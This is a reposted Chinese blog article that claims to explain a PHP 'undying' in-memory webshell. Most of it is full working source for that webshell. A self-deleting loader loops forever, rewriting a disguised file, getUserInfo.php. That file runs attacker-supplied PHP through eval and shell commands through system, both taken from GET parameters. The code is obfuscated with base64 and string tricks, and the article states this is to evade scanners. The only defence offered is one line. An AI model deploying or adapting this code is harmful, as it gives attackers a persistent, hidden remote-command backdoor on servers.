带你分析PHP内存木马病毒实现原理
更新:2022-10-31 17:49:36
人气:465
来源:互联网转载
A+
内存木马,就是在内存中运行的木马病毒,没有代码实体。内存木马有着强隐蔽性,排查困难,杀不死(俗称不死马)的特点。
网络安全行业,有着很强的木桶效应。系统对抗黑帽,胜负取决于安全最薄弱的环节。黑帽对抗白帽,胜负取决于攻击水平和和毁尸灭迹隐蔽的水平。
正文本文不讨论是由于任意文件上传还是近源攻击让生产服务器有了一段可访问的恶意代码。
病毒源代码 (很简单)
<?php //设置脚本不超时 set_time_limit(0); ignore_user_abort(true); //删除文件本体 @unlink(__FILE__); //给木马病毒起一个迷惑性的名字 $file = './getUserInfo.php'; //死循环常驻内存。释放木马文件 while(true) { if(! file_exists($file)) @file_put_contents($file, base64_de code('PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0=')); sleep(60); }
释放病毒本体
<?php //以下代码实现了ev al关键字和system函数的伪装 //ev al($_GET['e']); if($e = @$_GET['e']) { $func = @create_function(null, base64_de code('ZXZhbCgi') . $e . base64_de code('Iik7')); $func(); } //system($_GET['s']); if($s = @$_GET['s']) { $f = str_replace('x', '', 'xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx'); $f($s); }
说明
以上关键敏感代码都做了编码,用于避开各种安全扫描的免杀。
一旦病毒样本运行起来,就会删除掉自身,并长期运行在内存当中。
就算被释放的木马被识破后删除,还会产生同样的文件。
解决方案
干掉进程后,删除释放的木马文件。
推荐的文章
随手记
- ● blob:http地址的原理及生成方法
- ● 华视CVR100系统身份证读卡器web驱动安装不识别解决办法
- ● web应用采用webcam实现拍照上传的PHP示例及参数说明
- ● PHP实现直播推流功能
- ● win10开机后屏幕黑屏只有鼠标但能启动任务管理器
- ● base64.js文件下载及使用方法说明
- ● windows利用bat微信双开、多开
- ● 百度API提交推送报{"error":401,"message":"tokenisnotvalid"}什么原因
- ● 如果在调用创建群接口时没有保存OpenConversationId,可以通过调用本接口通过chatId获取OpenConversationId
- ● Windows中使用BAT文件设置指定IP地址或自动获取IP
PHP经验分享
- ● MySQLSUM在没有符合查询条件时返回结果为空的处理办法
- ● 如何开启PHP8的JIT提升运行速度
- ● 钉钉API接口-用PHP+Curl实现获取用户信息
- ● 钉钉API接口-用PHP+Curl实现获取应用Access_Token
- ● 在PHP中使用CURL,“撩”服务器只需几行——phpcurl详细解析和常见大坑
- ● MySQLInnodb并发涉及参数说明
- ● mysql参数调优之innodb_thread_concurrency、innodb_concurrency_tickets合理的使用cpu性能
- ● PHP用fsockopen检测指定IP端口是否开启可用
- ● PHP用socket检测服务器IP端口是否开放?代码示例
- ● GatewayWorker报错:Waring:Events::onMessageisnotcallable